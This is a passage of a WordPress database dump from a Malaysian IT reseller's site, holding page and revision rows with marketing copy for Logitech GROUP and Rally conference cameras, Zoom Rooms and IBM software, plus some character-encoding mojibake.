https://bintara.com.my/wp-content/uploads/2019/02/conferencecam-group-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/conferencecam-group-1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/conferencecam-group-1.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/02/conferencecam-group-1-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/conferencecam-group-1-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h3>HIGH-DEFINITION VIDEO</h3><p>Bring meetings into focus with GROUPâ€™s premium lens, 10x lossless zoom, and HD 1080p/30 performance. Perfectly frame presenters and whiteboards with pan/tilt control, and zoom in for detail and clarity. GROUPâ€™s 90Â° field-of-view provides ideal coverage for medium and large conference rooms, with motorized pan and tilt for wall-to-wall, floor-to-ceiling coverage.</p><h3>NATURAL-SOUNDING AUDIO</h3><p>Everyone hears and can be heard with GROUPâ€™s full-duplex speakerphone, which delivers sound thatâ€™s crisp, clear, and highly intelligible. Acoustic echo cancellation and noise reduction technology make conversations natural-sounding while reducing reverberation and ambient noise.</p>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/conferencecam-group-2.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/conferencecam-group-2.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/02/conferencecam-group-2-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/conferencecam-group-2-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n			<h4>ADDITIONAL FEATURES</h4>		\n		<h4>SPEAKERPHONE WITH BLUETOOTH</h4><p>Hear and be heard with life-like clarity. GROUPâ€™s full-duplex speakerphone provides 360Â° coverage with four omnidirectional mics. Beamforming technology helps pick up speech throughout a 6m / 20 ft diameter while reducing keyboard clicks and other audible distractions. You can even pair GROUP with your smartphone or tablet to enjoy outstanding audio clarity and ample volume with mobile applications and conference calls.</p><h4>CERTIFIED FOR BUSINESS</h4><p>GROUP offers a plug-and-play USB connection to conference room computers, and is certified for Skype for Business, Microsoft CortanaÂ®, Cisco Jabberâ„¢ compatible, and offers enhanced integration with BlueJeans, Broadsoft, LifeSize Cloud, Vidyo, and Zoom. If your preferred application can recognize a webcam, you can use it with GROUP.</p><h4>CONVENIENT CONTROLS</h4><p>GROUPâ€™s speakerphone provides a convenient dock for the handheld remote control, and features an LCD status screen and tactile buttons to mute audio, adjust volume, move the camera, and more.</p><h4>AVAILABLE EXPANSION MICS</h4><p>Extend the range of the GROUP video conferencing system with Logitech GROUP Expansion Mics. Accommodate up to 20 people in one large room and make sure everyoneâ€™s voice can be heard. Simply plug the microphones into the GROUP speakerphone: they are automatically recognized and configured. An indicator light shows when the microphone is muted, when a call is active, and when Bluetooth wireless pairing has begun.</p><h4>MUTE WITH CONFIDENCE</h4><p>With tactile mute buttons on the speakerphone, handheld remote, and optional expansion mics, GROUP makes it easy to assure your privacy. When muted, GROUPâ€™s LED status ring lights up red, a subtle yet obvious assurance thatâ€™s easily seen throughout the room.</p><h4>CABLING MADE EASY</h4><p>GROUPâ€™s compact Hub simplifies cabling and makes it easy to run cables under tables and through conduit. Integrated data and power means that the camera and speakerphone each connect with a single cable. The included 5m / 16 ft cables give you lots of placement options, while optional extended cables offer double or triple the reach.</p><h4>FIELD UPGRADEABLE</h4><p>With regular firmware updates, Logitech continuously improves the GROUP video conferencing experience. For example, recent updates delivered substantial improvements to automatic echo cancellation and gain control, plus upgraded beamforming and duplex performance. Itâ€™s another reason why Logitech delivers the best value proposition in the industry.</p><p>[maxbutton id=\"3\" ]</p>','Logitech GROUP','','inherit','closed','closed','','2000-revision-v1','','','2019-02-14 14:50:48','2019-02-14 06:50:48','',2000,'https://bintara.com.my/blog/2019/02/14/2000-revision-v1/',0,'revision','',0),(1260,1,'2018-12-11 10:13:14','2018-12-11 02:13:14','','thumbnail','','inherit','closed','closed','','thumbnail','','','2018-12-11 10:13:14','2018-12-11 02:13:14','',0,'https://bintara.com.my/wp-content/uploads/2018/12/thumbnail.jpg',0,'attachment','image/jpeg',0),(3066,1,'2019-03-21 10:58:05','2019-03-21 02:58:05','<h2>Zoom for the Conference Room</h2><h3>Software-based, flawless video, integrated audio, and wireless content sharing</h3>https://youtu.be/yRQGXlJS-xI<h3>Simple, flexible set up</h3><p>Build the room you need with the hardware you want on top on Zoomâ€™s cloud-based platform.</p><h3>Modern capabilities</h3><p>Deploy scalable conferencing solutions that help you address the problems of today and opportunities of tomorrow.</p><h3>Happy, productive users</h3><p>We focus on delivering compelling, easy-to-use technology, so that you and your teams can focus on the task at hand.</p><h4>HD video and audio</h4><p>Bring high quality video, audio, and web conferencing to your existing rooms.</p><h4>Wireless sharing</h4><p>Cut the cords, cables, and dongles -- present content wirelessly from your laptop or mobile device.</p><h4>Interoperability with any video system</h4><p>Communicate with existing SIP or H.323 systems</p><h4>Meet with anyone</h4><p>Include remote participants on desktop, mobile, or other conference room systems.</p><h4>One touch to start meetings</h4><p>Leveraging native integrations with Cisco and Polycom, bring one-touch to start a meeting through your calendaring system.</p><h4>Centralized management</h4><p>Get the overview status and management of deployed conference rooms in a single admin console</p>		\n			<h3>Zoom Rooms includes the following value-added services at no additional cost.</h3>		\n		<h3>Digital Signage</h3><p>Digital Signage gives organizations the power to manage corporate communications, internal marketing, and more across multiple offices and departments from the Zoom Admin Portal.</p><ul><li>Leverage room displays when not in use</li><li>Manage displays at scale or individually</li><li>Unlimited amount of displays supported (both in and out of conference rooms)</li></ul><h3>Scheduling Display</h3><p>End scheduling headaches with a beautiful display that provides room availability information and capabilities to book a meeting for any available time of that day.</p><h3>Make interactive collaboration easy with touch screens</h3><p>Power up your team with Zoom meetings on collaborative touch screens featuring screen sharing, white boarding, and co-annotationÂ  all at the tip of your fingers.</p>https://youtu.be/gezS90Pg_fk<p>[maxbutton id=\"1\" ]</p>','Zoom','','inherit','closed','closed','','1620-autosave-v1','','','2019-03-21 10:58:05','2019-03-21 02:58:05','',1620,'https://bintara.com.my/blog/2019/03/21/1620-autosave-v1/',0,'revision','',0),(2906,1,'2019-02-14 14:57:33','2019-02-14 06:57:33','<h3>RALLY</h3>\r\nPremium Ultra-HD ConferenceCam system with automatic camera control\r\n<ul>\r\n 	<li>RightSenseâ„¢ technology automates a better user experience</li>\r\n 	<li>Modular audio for full coverage of medium to very large rooms</li>\r\n 	<li>Premium components and sleek industrial design</li>\r\n</ul>\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp-300x262.png\" sizes=\"(max-width: 300px) 100vw, 300px\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp-300x262.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp.png 687w\" alt=\"\" width=\"300\" height=\"262\" />\r\n<h3>ALL TOGETHER NOW</h3>\r\nLogitech Rally delivers studio-quality video, unmatched voice clarity, and RightSenseâ„¢ automation for better meetings with video conferencing applications that work with USB devices, including Google Hangouts Meet, Microsoft SkypeÂ® for Business, Microsoft Teams, and Zoom. With modular audio, thoughtful cable management and premium finishes, Rally integrates beautifully into medium and larger rooms.\r\n<h4>KEY FEATURES</h4>\r\nhttps://youtu.be/uwx62jjxOnE\r\n<h3>STUDIO-QUALITY VIDEO</h3>\r\nWith an Ultra-HD imaging system, Rally delivers brilliantly sharp video, outstanding color, and exceptional optical accuracy at resolutions up to 4K. Logitech RightLightâ„¢technology optimizes light balance to emphasize faces and render natural-looking skin tones, even in dim or backlit conditions.\r\n<h3>ADVANCED MODULAR AUDIO</h3>\r\nCrystal-clear audio is essential for world-class video conferencing, and Rally excels in delivering sound thatÂ’s natural, crisp, and highly intelligible. Logitech RightSoundÂ™â„¢ enhances voice clarity by suppressing background noise, auto-leveling voices, and focusing on active speakers. Exquisitely sensitive mic pods ensure that everyone in the meeting can be clearly heard while stand-alone speakers fill larger rooms with rich, life-like sound.\r\n\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp.jpg\" sizes=\"(max-width: 800px) 100vw, 800px\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-768x432.jpg 768w\" alt=\"\" width=\"800\" height=\"450\" />\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-1.jpg\" sizes=\"(max-width: 800px) 100vw, 800px\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-1.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-1-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-1-768x432.jpg 768w\" alt=\"\" width=\"800\" height=\"450\" />\r\n<h3>SLEEK INDUSTRIAL DESIGN</h3>\r\nEvery component in the Rally system features premium industrial design suitable for any professional setting. Even as Rally helps everyone look and sound great during video meetings, each part of the system looks great in its own right. The premium PTZ camera at the core of the system is elegantly finished in matte black with slate gray metal trim, complemented by sleekly designed audio components and accessories that look great in any room.\r\n<h3>ENHANCED USER EXPERIENCE</h3>\r\nLogitech RightSenseâ„¢ is a suite of technologies built into Rally that automate a better user experience. RightSightâ„¢ perfectly auto-frames participants no matter their distance from the lens. RightLightâ„¢ prioritizes faces over environment to render natural-looking skin tones while RightSoundÂ™â„¢ enhances vocal clarity by suppressing background noise, auto-leveling voices, and focusing on active speakers to support better meetings â€” Â—automatically!\r\n\r\nhttps://youtu.be/-xGIqpPOyXs\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-2.jpg\" sizes=\"(max-width: 800px) 100vw, 800px\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-2.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-2-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-2-768x433.jpg 768w\" alt=\"\" width=\"800\" height=\"451\" />\r\n<h3>SMART CABLING AND CONTENT SHARING</h3>\r\nWith a Display Hub and Table Hub to keep cables neat and organized, Rally components and the meeting computer remain securely out of sight. Connected by a single CAT6 cable, both hubs feature a full complement of connections so you can locate the meeting computer near the display or at the table. An HDMI input on the Table Hub eliminates the need for extra-cost cable extenders and makes wired content sharing easy.\r\n\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-3.jpg\" sizes=\"(max-width: 800px) 100vw, 800px\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-3.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-3-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-3-768x433.jpg 768w\" alt=\"\" width=\"800\" height=\"451\" />\r\n<h4>ADDITIONAL FEATURES</h4>\r\n<h4>SEE EVERYONE, PERFECTLY FRAMED</h4>\r\nLogitech RightSightÂ™ camera control1 automatically moves and adjusts the lens to comfortably frame meeting participants in rooms of all shapes and sizes.\r\n<h4>LET THE SUNSHINE IN</h4>\r\nEven in meeting rooms with bright windows, Logitech RightLightÂ™ technology with Wide Dynamic Range (WDR) prioritizes faces and human figures over objects and surfaces. The result is a balanced image that renders participants in flattering light with reduced glare and softer shadows, even in dim or backlit conditions\r\n<h4>ADAPTIVE PAN, TILT AND ZOOM</h4>\r\nPan and tilt speeds automatically adapt to the level of zoom. The result: faster camera movement when zoomed out for quick framing and slower camera movement when zoomed in for more control.\r\n<h4>FRONT OF ROOM AUDIO</h4>\r\nUnlike tabletop speakerphones that decouple voices from video, Rally speakers are designed for placement at the front of the room. By aligning speakers with the display, a person\'Â’s voice and video both come from the same place Â— and never from behind you â€” Â— so conversations feel more natural and lifelike.\r\n<h4>OPTIONAL MOUNTING KIT</h4>\r\nAdd Rally Mounting Kit for a streamlined installation of each component. Strong wall mounts allow ideal placement for the camera and two speakers, while ventilated mounting plates attach the display and table hubs on a wall or beneath a table. Two cleverly-designed retainers keep cables secure.\r\n<h4>LOUD AND CLEAR</h4>\r\nThe Rally display hub powers up to two speakers, providing rich sound even in larger rooms. A patent-pending suspension system virtually eliminates vibrations that travel through walls, stands, and tables. This improves echo cancellation while keeping video shake-free, even at high volume levels and when zoomed in.\r\n<h4>UP TO 7 MIC PODS</h4>\r\nFor rooms with more than 10 participants, add Rally Mic Pods to expand audio coverage and provide convenient access to mute controls. Each pod adds coverage for six more participants, so you can deploy Rally in large meeting spaces and boardrooms with up to 46 people.\r\n<h4>FLEXIBLE MIC POD CABLING</h4>\r\nA more flexible alternative to daisy-chain connections, Rally Mic Pod Hub makes it easy to run cables beneath the table with three connections for Rally Mic Pods or additional Mic Pod Hubs. With a single-cable connection, participants can reposition individual mic pods to make space on the table or to bring mute control within easy reach.\r\n\r\n[maxbutton id=\"3\" ]','Logitech RALLY','','publish','closed','closed','','logitech-rally','','','2019-03-04 14:52:30','2019-03-04 06:52:30','',0,'https://bintara.com.my/?page_id=2906',0,'page','',0),(2907,1,'2019-02-14 14:57:33','2019-02-14 06:57:33','','LOGITECH RALLY','','inherit','closed','closed','','2906-revision-v1','','','2019-02-14 14:57:33','2019-02-14 06:57:33','',2906,'https://bintara.com.my/blog/2019/02/14/2906-revision-v1/',0,'revision','',0),(1267,1,'2018-12-11 10:29:57','2018-12-11 02:29:57','[wpforms id=\"1251\"]','Contact Us','','inherit','closed','closed','','19-revision-v1','','','2018-12-11 10:29:57','2018-12-11 02:29:57','',19,'https://bintara.com.my/blog/2018/12/11/19-revision-v1/',0,'revision','',0),(1268,1,'2018-12-11 10:31:11','2018-12-11 02:31:11','[vfb id=\"1\"]','Contact Us','','inherit','closed','closed','','19-revision-v1','','','2018-12-11 10:31:11','2018-12-11 02:31:11','',19,'https://bintara.com.my/blog/2018/12/11/19-revision-v1/',0,'revision','',0),(1269,1,'2018-12-11 10:31:18','2018-12-11 02:31:18','','BINTARA Logo','','inherit','closed','closed','','logo-bintara-asal','','','2018-12-11 11:41:35','2018-12-11 03:41:35','',1313,'https://bintara.com.my/wp-content/uploads/2018/12/Logo-Bintara-Asal.png',0,'attachment','image/png',0),(1271,1,'2018-12-11 10:32:24','2018-12-11 02:32:24','https://bintara.com.my/wp-content/uploads/2018/12/cropped-Logo-Bintara-Asal.png','cropped-Logo-Bintara-Asal.png','','inherit','closed','closed','','cropped-logo-bintara-asal-png','','','2018-12-11 10:32:24','2018-12-11 02:32:24','',0,'https://bintara.com.my/wp-content/uploads/2018/12/cropped-Logo-Bintara-Asal.png',0,'attachment','image/png',0),(1273,1,'2018-12-11 10:40:27','2018-12-11 02:40:27','https://bintara.com.my/wp-content/uploads/2018/12/cropped-Logo-Bintara-Asal-1.png','cropped-Logo-Bintara-Asal-1.png','','inherit','closed','closed','','cropped-logo-bintara-asal-1-png','','','2018-12-11 10:40:27','2018-12-11 02:40:27','',0,'https://bintara.com.my/wp-content/uploads/2018/12/cropped-Logo-Bintara-Asal-1.png',0,'attachment','image/png',0),(1274,1,'2018-12-11 10:43:28','2018-12-11 02:43:28','','onepress-dummy-data','','inherit','closed','closed','','onepress-dummy-data','','','2018-12-11 10:43:28','2018-12-11 02:43:28','',0,'https://bintara.com.my/wp-content/uploads/2018/12/onepress-dummy-data.xml',0,'attachment','',0),(1275,1,'2018-12-11 10:43:28','2018-12-11 02:43:28','','onepress-config','','inherit','closed','closed','','onepress-config','','','2018-12-11 10:43:28','2018-12-11 02:43:28','',0,'https://bintara.com.my/wp-content/uploads/2018/12/onepress-config.json',0,'attachment','',0),(2896,1,'2019-02-14 14:29:59','2019-02-14 06:29:59','<h3>Rally Camera</h3><p>Premium PTZ camera with Ultra-HD imaging system and automatic camera control.</p><ul><li>RightSenseâ„¢ technology automates a better user experience</li><li>Advanced optics frame every participant with amazing clarity</li><li>Sleek industrial design for any professional meeting space</li></ul>		\n										<img width=\"300\" height=\"262\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-camera-300x262.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-camera-300x262.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/rally-camera-e1544499263206.png 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h3>Peerless Performance. Exceptional Versatility.</h3><p><br />With premium industrial design and an Ultra-HD imaging system, Rally Camera tops the lineup of standalone video cameras from LogitechÂ®. Packed with advanced optics and breakthrough technologies, Rally Camera delivers premium performance in professional meeting spaces of all shapes and sizes. With whisper-quiet mechanical Pan/Tilt/Zoom, razor-sharp 15X HD zoom, expansive 90Â° field of view, and powerful 4K sensor, Rally Camera captures every person in the room with truly phenomenal video quality.</p>https://youtu.be/TWRoAslIm0c<h3>STUDIO-QUALITY VIDEO</h3><p>With an Ultra-HD imaging system, Rally Camera delivers brilliantly sharp video, outstanding colour, and exceptional optical accuracy at resolutions up to 4K. Logitech RightLightâ„¢ technology optimises light balance to emphasise faces and render natural-looking skin tones, even in dim or backlit conditions.</p><h3>SLEEK INDUSTRIAL DESIGN</h3><p>Rally Camera incorporates world-class Logitech optics and 4K sensor in a premium industrial design suitable for any professional setting. Elegantly finished in matte black with slate gray metal trim, Rally Camera can be positioned on a table, mounted on a tripod, or secured to a wall with included hardware. For overhead installations, the camera detects when itâ€™s inverted and automatically corrects image orientation and camera controls.</p>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-camera.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-camera.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/02/rally-camera-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/rally-camera-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h3>SEE EVERYONE, PERFECTLY FRAMED</h3><p>Logitech RightSightâ„¢ camera control automatically moves and adjusts the lens to comfortably frame meeting participants in rooms of all shapes and sizes.</p><p>Future Availability: RightSight will be enabled by a software download, with initial support for Windows 10.</p>https://youtu.be/-xGIqpPOyXs<h3>ENHANCED USER EXPERIENCE</h3><p>Logitech RightSenseâ„¢ is a suite of proactive technologies built into Rally Camera that automate a better user experience. RightSightâ„¢ automates camera control to perfectly frame participants, no matter their distance from the lens. RightLightâ„¢ optimises light balance and prioritises faces over objects and surfaces to render natural-looking skin tones. Plus, Rally Camera is compatible with virtually any video conferencing app right out of the box.</p><h3>PRIVACY ASSURANCE</h3><p>When Rally Camera is not in use, the lens defaults to a parked position where the lens is pointed straight down. This provides visual affirmation that the camera is unable to â€œseeâ€ anything in the meeting space when idle. The lens lifts to a preset position when joining a meeting and parks automatically when the meeting ends. In addition, whenever video is muted during a meeting, a status light illuminates red to affirm visual privacy.</p>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-camera-1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-camera-1.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/02/rally-camera-1-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/rally-camera-1-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />','Logitech Rally Camera','','inherit','closed','closed','','2885-revision-v1','','','2019-02-14 14:29:59','2019-02-14 06:29:59','',2885,'https://bintara.com.my/blog/2019/02/14/2885-revision-v1/',0,'revision','',0),(1278,1,'2018-12-11 10:55:02','2018-12-11 02:55:02','','PRODUCTS & SERVICES','','inherit','closed','closed','','1277-revision-v1','','','2018-12-11 10:55:02','2018-12-11 02:55:02','',1277,'https://bintara.com.my/blog/2018/12/11/1277-revision-v1/',0,'revision','',0),(1279,1,'2018-12-11 10:55:28','2018-12-11 02:55:28','Careers with BINTARA','CAREERS','','publish','closed','closed','','careers','','','2018-12-11 12:16:52','2018-12-11 04:16:52','',0,'https://bintara.com.my/?page_id=1279',0,'page','',0),(1280,1,'2018-12-11 10:55:28','2018-12-11 02:55:28','','CAREERS','','inherit','closed','closed','','1279-revision-v1','','','2018-12-11 10:55:28','2018-12-11 02:55:28','',1279,'https://bintara.com.my/blog/2018/12/11/1279-revision-v1/',0,'revision','',0),(1281,1,'2018-12-11 10:55:49','2018-12-11 02:55:49','','NEWS & EVENTS','','publish','closed','closed','','news-events','','','2018-12-11 10:56:12','2018-12-11 02:56:12','',0,'https://bintara.com.my/?page_id=1281',0,'page','',0),(1282,1,'2018-12-11 10:55:49','2018-12-11 02:55:49','','NEWS & EVENTS','','inherit','closed','closed','','1281-revision-v1','','','2018-12-11 10:55:49','2018-12-11 02:55:49','',1281,'https://bintara.com.my/blog/2018/12/11/1281-revision-v1/',0,'revision','',0),(2895,1,'2019-02-14 14:29:35','2019-02-14 06:29:35','<h3>Rally Camera</h3><p>Premium PTZ camera with Ultra-HD imaging system and automatic camera control.</p><ul><li>RightSenseâ„¢ technology automates a better user experience</li><li>Advanced optics frame every participant with amazing clarity</li><li>Sleek industrial design for any professional meeting space</li></ul>		\n										<img width=\"300\" height=\"262\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-camera-300x262.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-camera-300x262.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/rally-camera-e1544499263206.png 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h3>Peerless Performance. Exceptional Versatility.</h3><p><br />With premium industrial design and an Ultra-HD imaging system, Rally Camera tops the lineup of standalone video cameras from LogitechÂ®. Packed with advanced optics and breakthrough technologies, Rally Camera delivers premium performance in professional meeting spaces of all shapes and sizes. With whisper-quiet mechanical Pan/Tilt/Zoom, razor-sharp 15X HD zoom, expansive 90Â° field of view, and powerful 4K sensor, Rally Camera captures every person in the room with truly phenomenal video quality.</p>https://youtu.be/TWRoAslIm0c<h3>STUDIO-QUALITY VIDEO</h3><p>With an Ultra-HD imaging system, Rally Camera delivers brilliantly sharp video, outstanding colour, and exceptional optical accuracy at resolutions up to 4K. Logitech RightLightâ„¢ technology optimises light balance to emphasise faces and render natural-looking skin tones, even in dim or backlit conditions.</p><h3>SLEEK INDUSTRIAL DESIGN</h3><p>Rally Camera incorporates world-class Logitech optics and 4K sensor in a premium industrial design suitable for any professional setting. Elegantly finished in matte black with slate gray metal trim, Rally Camera can be positioned on a table, mounted on a tripod, or secured to a wall with included hardware. For overhead installations, the camera detects when itâ€™s inverted and automatically corrects image orientation and camera controls.</p>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-camera.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-camera.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/02/rally-camera-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/rally-camera-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h3>SEE EVERYONE, PERFECTLY FRAMED</h3><p>Logitech RightSightâ„¢ camera control automatically moves and adjusts the lens to comfortably frame meeting participants in rooms of all shapes and sizes.</p><p>Future Availability: RightSight will be enabled by a software download, with initial support for Windows 10.</p>https://youtu.be/-xGIqpPOyXs<h3>ENHANCED USER EXPERIENCE</h3><p>Logitech RightSenseâ„¢ is a suite of proactive technologies built into Rally Camera that automate a better user experience. RightSightâ„¢ automates camera control to perfectly frame participants, no matter their distance from the lens. RightLightâ„¢ optimises light balance and prioritises faces over objects and surfaces to render natural-looking skin tones. Plus, Rally Camera is compatible with virtually any video conferencing app right out of the box.</p><h3>PRIVACY ASSURANCE</h3><p>When Rally Camera is not in use, the lens defaults to a parked position where the lens is pointed straight down. This provides visual affirmation that the camera is unable to â€œseeâ€ anything in the meeting space when idle. The lens lifts to a preset position when joining a meeting and parks automatically when the meeting ends. In addition, whenever video is muted during a meeting, a status light illuminates red to affirm visual privacy.</p>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-camera-1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-camera-1.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/02/rally-camera-1-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/rally-camera-1-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />','Logitech Rally Camera','','inherit','closed','closed','','2885-revision-v1','','','2019-02-14 14:29:35','2019-02-14 06:29:35','',2885,'https://bintara.com.my/blog/2019/02/14/2885-revision-v1/',0,'revision','',0),(1284,1,'2018-12-11 10:57:48','2018-12-11 02:57:48','','PRODUCTS','','publish','closed','closed','','products-services','','','2019-09-24 08:57:12','2019-09-24 00:57:12','',0,'https://bintara.com.my/?p=1284',3,'nav_menu_item','',0),(1530,1,'2018-12-11 15:36:22','2018-12-11 07:36:22','<h2 style=\"text-align: center;\">IBM Software</h2><h4 style=\"text-align: center;\">IBM Business Solution</h4><h3 style=\"text-align: center;\"><strong>IBM Sterling Commerce</strong></h3><p style=\"text-align: center;\">Use eCommerce, connectivity and integration to deliver personalized retail experiences</p><h3 style=\"text-align: center;\"><strong>IBM Coremetrics</strong></h3><p style=\"text-align: center;\">Analyze data from customer behavior to uncover trends and insights for targeted marketing</p><h3 style=\"text-align: center;\"><strong>IBM Unica</strong></h3><p style=\"text-align: center;\">Deliver single, personalized experiences across channels to increase customer engagement</p><h3 style=\"text-align: center;\"><strong>IBM Tealeaf</strong></h3><p style=\"text-align: center;\">Explore digital customer experience management and customer behavior analysis solutions</p>		\n		<h2 style=\"text-align: center;\">IBM Software</h2><h4 style=\"text-align: center;\">IBM IT Infrastructure</h4><h3 style=\"text-align: center;\"><strong>IBM WebSphere Application Server</strong></h3><p style=\"text-align: center;\">Develop next generation Java apps in the cloud and pay as you go</p><h3 style=\"text-align: center;\"><strong>IBM MQ</strong></h3><p style=\"text-align: center;\">Accelerate the integration of applications and business data across multiple platforms</p><h3 style=\"text-align: center;\"><strong>IBM and Apache Spark</strong></h3><p style=\"text-align: center;\">Create algorithms and speed analytics applications to gain insights from complex data</p><h3 style=\"text-align: center;\"><strong>IBM Spectrum Protect</strong></h3><p style=\"text-align: center;\">Protect and recover data for virtual, physical, cloud and software-defined environments</p><h3 style=\"text-align: center;\"><strong>IBM z/OS Connect Enterprise Edition</strong></h3><p style=\"text-align: center;\">Develop efficient and scalable RESTful APIs for mobile and cloud apps</p><h3 style=\"text-align: center;\"><strong>IBM UrbanCode Deploy</strong></h3><p style=\"text-align: center;\">Automate the application deployment process to accelerate time to market</p><h3 style=\"text-align: center;\"><strong>CICS</strong></h3><p style=\"text-align: center;\">Use high-performance enterprise application servers for Z Systems with support for a range of languages</p><h3 style=\"text-align: center;\"><strong>IBM Information Management System (IMS)</strong></h3><p style=\"text-align: center;\">Explore a fast and security-rich hierarchical database manager for OLTP</p>		\n		<h2 style=\"text-align: center;\">IBM Software</h2><h4 style=\"text-align: center;\">IBM Analytics</h4><h3 style=\"text-align: center;\"><strong>IBM Cognos Analytics on Cloud</strong></h3><p style=\"text-align: center;\">Uncover new insights quickly and easily with automated data analysis, automatic visualization and predictive analytics</p><h3 style=\"text-align: center;\"><strong>IBM SPSS</strong></h3><p style=\"text-align: center;\">Get deeper, more meaningful insights from your data and predict what is likely to happen next</p><h3 style=\"text-align: center;\"><strong>IBM Maximo</strong></h3><p style=\"text-align: center;\">Manage physical assets on a common platform for better asset lifecycle and maintenance management</p><h3 style=\"text-align: center;\"><strong>IBM DB2 on Cloud</strong></h3><p style=\"text-align: center;\">Explore no-boundaries database software for the digital, cloud and cognitive era</p><p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>','IBM','','publish','closed','closed','','ibm','','','2019-10-02 16:45:37','2019-10-02 08:45:37','',0,'https://bintara.com.my/?page_id=1530',0,'page','',0),(2894,1,'2019-02-14 14:29:20','2019-02-14 06:29:20','','rally-camera (1)','','inherit','closed','closed','','rally-camera-1','','','2019-02-14 14:29:20','2019-02-14 06:29:20','',2885,'https://bintara.com.my/wp-content/uploads/2019/02/rally-camera-1.jpg',0,'attachment','image/jpeg',0),(1287,1,'2018-12-11 11:01:21','2018-12-11 03:01:21','<p style=\"text-align: center; margin-top: -100px; font-size: 1.25rem;\">BINTARA is a multi-brand technology solutions provider to business, government, education and\r\nhealthcare organisations in Malaysia. We help our clients achieve their goals by delivering integrated solutions and services that maximise their technology investment.</p>','ABOUT','','publish','closed','closed','','about','','','2019-09-26 12:10:23','2019-09-26 04:10:23','',0,'https://bintara.com.my/?page_id=1287',0,'page','',0),(3244,1,'2019-09-24 08:37:44','2019-09-24 00:37:44','BINTARA is a multi-brand technology solutions provider to business, government, education and\r\nhealthcare organisations in Malaysia. We help our clients achieve their goals by delivering integrated solutions and services that maximise their technology investment.','ABOUT','','inherit','closed','closed','','1287-revision-v1','','','2019-09-24 08:37:44','2019-09-24 00:37:44','',1287,'https://bintara.com.my/blog/2019/09/24/1287-revision-v1/',0,'revision','',0),(1289,1,'2018-12-11 11:01:21','2018-12-11 03:01:21','<p style=\"text-align: center;\">BINTARA is a multi-brand technology solutions provider to business, government, education and\r\nhealthcare organisations in Malaysia. We help our clients achieve their goals by delivering integrated solutions and services that maximise their\r\ntechnology 